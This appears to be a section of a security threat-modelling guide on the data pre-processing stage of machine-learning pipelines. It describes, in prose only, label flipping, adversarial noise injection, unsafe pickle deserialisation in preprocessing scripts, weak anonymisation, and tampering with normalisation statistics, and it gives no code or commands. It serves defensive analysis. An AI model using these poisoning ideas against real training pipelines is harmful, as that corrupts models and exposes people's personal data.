Data Pre‑processing

Cleaning/normalization, deduplication, imputation, encoding, and data sanitisation of personal data (generalization, suppression, perturbation of identifiers/quasi‑identifiers) to reduce re‑identification risk before downstream use.

Attack surfaces

  • Label‑Flipping Attacks: Adversaries hide targeted re-labeling within cleaning scripts or pull requests, altering the meaning of training examples.

    Ex: In a medical dataset, attackers flip “benign tumor” labels to “malignant.” A cancer-detection model trained on this poisoned dataset produces dangerously skewed diagnoses.

  • Adversarial Noise Injection: Malicious actors conceal adversarial perturbations under the guise of normalization or denoising. These perturbations later trigger model misclassifications.

    Ex: A poisoned speech dataset includes tiny perturbations masked as background noise. The resulting voice-recognition model consistently misidentifies attacker-chosen phrases.

  • Pipeline Code Exploitation: Insecure ETL scripts, notebooks, or deserialization routines can be hijacked to execute arbitrary code or exfiltrate data.

    Ex:A malicious update to a Python preprocessing script uses unsafe pickle.load calls, leading to remote code execution and leakage of sensitive training data.

  • Privacy Regression During Sanitisation: Poorly designed anonymization fails to suppress quasi-identifiers, allowing re-identification.

    Ex: A healthcare dataset anonymizes names but leaves unique patient admission dates and rare combinations of treatments, enabling re-identification of individuals.

  • Feature‑Scale Tampering: Attackers manipulate summary statistics used for scaling or normalization, biasing downstream model behavior.

    Ex: By injecting outliers into financial data, attackers distort normalization so that fraudulent transactions appear statistically “normal” to the fraud detection model.